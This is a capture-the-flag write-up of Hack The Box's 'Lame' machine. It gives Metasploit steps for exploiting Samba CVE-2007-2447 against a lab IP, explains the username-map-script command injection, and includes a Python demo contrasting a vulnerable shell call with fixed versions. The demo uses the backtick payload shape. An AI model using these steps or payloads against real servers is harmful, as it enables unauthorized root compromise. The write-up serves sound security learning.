This is my first write-up ever. Even though there are about a trillion write-ups about this box out there, I thought it might be a nice touch to start with the box that hackthebox started with as well.
During my hacker journey I read quite a lot of write-ups. I found that most of my learning came from doing my own mini write-ups after rooting each box. Eventually I realized that their structure differs a little from that of many other write-ups out there.
For myself, I start with a “Script-Kiddie steps to root” section which contains only the commands necessary to root a box. You should not use those as hints, but they’re very helpful if you want to have a quick look back at a box you did a while ago, or if you want to do a write-up about that specific box.
When I’m stuck I value hints over solutions. I feel like that increases my learning. To support that, my write-ups will contain (a horrible) drawing which sketches out the solution. This also helps me to see what that box was about in one glance.
Lastly, I’m very detail-oriented and always want to understand how the exploits that I use work. Therefore, I’ll include a short summary as well as links to the resources explaining how the exploit used on the box works.
Now, without further ado, let’s hack.
Lame is the very first box ever published by hackthebox and probably one of the easiest. Enumeration as well as exploitation only take a single step each.
- sudo nmap -sV -sC -O -A -p- 10.10.10.3 (-A already implies -sV, -sC and -O, so sudo nmap -A -p- 10.10.10.3 does the same)
- find 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) in the output
- Google finds CVE-2007-2447 with a metasploit module
- use exploit/multi/samba/usermap_script
- set lhost <YOUR_LAB_IP>
- set rhosts 10.10.10.3
- run
Since there is really not a lot to explain, I’ll save you some time and not explain the steps any further. If you don’t want to work with metasploit, check out this git-repo. It contains a python script which exploits the same vulnerability.
Even though the exploit is this easy, the vulnerability we use to gain access is a little more involved. We just exploited CVE-2007-2447, which affects Samba 3.0.0 through 3.0.25rc3. For the exploit to work without authentication, the “username map script” option has to be set in smb.conf. The version banner nmap shows (3.X - 4.X) is far too coarse to confirm the bug, and there is no way for us as attackers to read smb.conf and check whether the option is set, so the only way to find out is to give the exploit a try: a non-vulnerable target simply gives us no session.
Unravelling the magic
The underlying problem is that those Samba versions take a client-supplied string from an MS-RPC call, substitute it into the command line configured as the username map script, and hand the result to /bin/sh for execution without escaping shell metacharacters.
We don’t need any authentication prior to exploitation because the vulnerable code path is reached through the SamrChangePassword call. That call is by design reachable without an authenticated session (Metasploit sends it over a null session on IPC$), so the username it carries is untrusted input that smbd processes before any credential check.
It follows that if the username we pass to SamrChangePassword contains shell metacharacters, for instance a command wrapped in backticks, the shell runs that command when smbd invokes the map script. Metasploit uses exactly this: the injected command launches its payload (by default a plain reverse command shell, not Meterpreter), which connects back to lhost and opens a session for us. Since smbd runs as root, that session is root from the start, which is why there is no privilege escalation step on this box.
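To make the three paragraphs above concrete, here is an added example that is neither Samba’s code nor the Metasploit module. It models the bug in miniature: a stand-in for the script configured as username map script, the vulnerable path that builds a command line and hands it to /bin/sh -c, two fixed shapes (argv passed with no shell in between, and shell-quoting when a shell is unavoidable), and a crafted username in the form the Metasploit module sends (a command in backticks, prefixed with “/=”). MAP_SCRIPT, the marker file and the usernames are constructed for the demo, which needs /bin/sh and /bin/echo to be present.

```python
"""Model of CVE-2007-2447: Samba's "username map script" command injection.

Added example, not Samba's code and not the Metasploit module. It reproduces
the shape of the bug (a client-controlled username pasted into a shell command
line) next to two fixed shapes. MAP_SCRIPT, the marker file and the usernames
are constructed for the demo; it needs /bin/sh and /bin/echo.
"""
import os
import shlex
import subprocess
import tempfile

# Stand-in for the script named by `username map script = ...` in smb.conf.
# A real one prints the Unix account a client-supplied name maps to; /bin/echo
# is enough to see exactly what reached the script (or the shell).
MAP_SCRIPT = "/bin/echo"


def run_map_script_vulnerable(username: str) -> str:
    """Pre-3.0.25 shape: "<script> <username>" is built as one string and run
    through /bin/sh -c, so backticks, ';', '|', '$(...)' in the name are
    interpreted by the shell before the script ever sees them."""
    cmdline = f"{MAP_SCRIPT} {username}"
    return subprocess.run(["/bin/sh", "-c", cmdline],
                          capture_output=True, text=True).stdout.strip()


def run_map_script_hardened(username: str) -> str:
    """Fixed shape: argv goes straight to the script with no shell in between,
    so the same bytes are just an argument."""
    return subprocess.run([MAP_SCRIPT, username],
                          capture_output=True, text=True).stdout.strip()


def run_map_script_quoted(username: str) -> str:
    """If a shell is unavoidable (the script is a shell one-liner, say), quote
    the untrusted value so the shell treats it as one literal word."""
    cmdline = f"{MAP_SCRIPT} {shlex.quote(username)}"
    return subprocess.run(["/bin/sh", "-c", cmdline],
                          capture_output=True, text=True).stdout.strip()


def usermap_payload(cmd: str) -> str:
    """Username in the shape the Metasploit module sends: the command inside
    backticks, prefixed with "/=". The module also wraps its payload in nohup;
    that is left out here so the demo stays synchronous and offline."""
    return f"/=`{cmd}`"


def demo(mapper) -> tuple[bool, str]:
    """Push a crafted username through `mapper`. Returns (did the embedded
    command run?, what the script printed). The embedded command creates a
    marker file in a fresh temp directory, so execution is observable."""
    marker = os.path.join(tempfile.mkdtemp(), "pwned")
    printed = mapper(usermap_payload(f"touch {marker}"))
    return os.path.exists(marker), printed


if __name__ == "__main__":
    for name, fn in [("vulnerable", run_map_script_vulnerable),
                     ("hardened", run_map_script_hardened),
                     ("quoted", run_map_script_quoted)]:
        ran, printed = demo(fn)
        print(f"{name:10s} command executed: {ran!s:5s} script saw: {printed!r}")
```

Running it shows the whole bug in one line of output each: the vulnerable mapper executes the touch and the script only ever sees “/=” (the backtick substitution has already been evaluated and replaced by the empty output of touch), while the two fixed mappers leave the marker uncreated and pass the literal backticked string to the script as data. The same untrusted bytes, a different boundary between data and command.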
That’ll be it for today. If you like what you read, or have any feedback, please let me know @h4xil10.